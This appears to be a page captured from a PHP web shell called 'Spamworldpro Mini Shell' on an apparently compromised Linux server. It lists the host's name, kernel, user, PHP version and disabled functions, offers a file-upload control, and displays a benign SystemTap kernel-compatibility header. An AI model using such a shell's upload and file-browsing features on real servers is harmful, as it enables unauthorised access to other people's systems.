Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /opt/rh/gcc-toolset-11/root/usr/share/systemtap/runtime/linux/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/rh/gcc-toolset-11/root/usr/share/systemtap/runtime/linux/stap_mmap_lock.h
#ifndef __STAP_MMAP_LOCK_H
#define __STAP_MMAP_LOCK_H

#ifdef STAPCONF_MMAP_LOCK
#include <linux/mmap_lock.h>
#else

/* for pre-5.8 kernels, emulate new api */

#define mmap_read_lock(mm) down_read(&mm->mmap_sem)
#define mmap_read_trylock(mm) down_read_trylock(&mm->mmap_sem)
#define mmap_read_unlock(mm) up_read(&mm->mmap_sem)

#endif
#endif

Spamworldpro Mini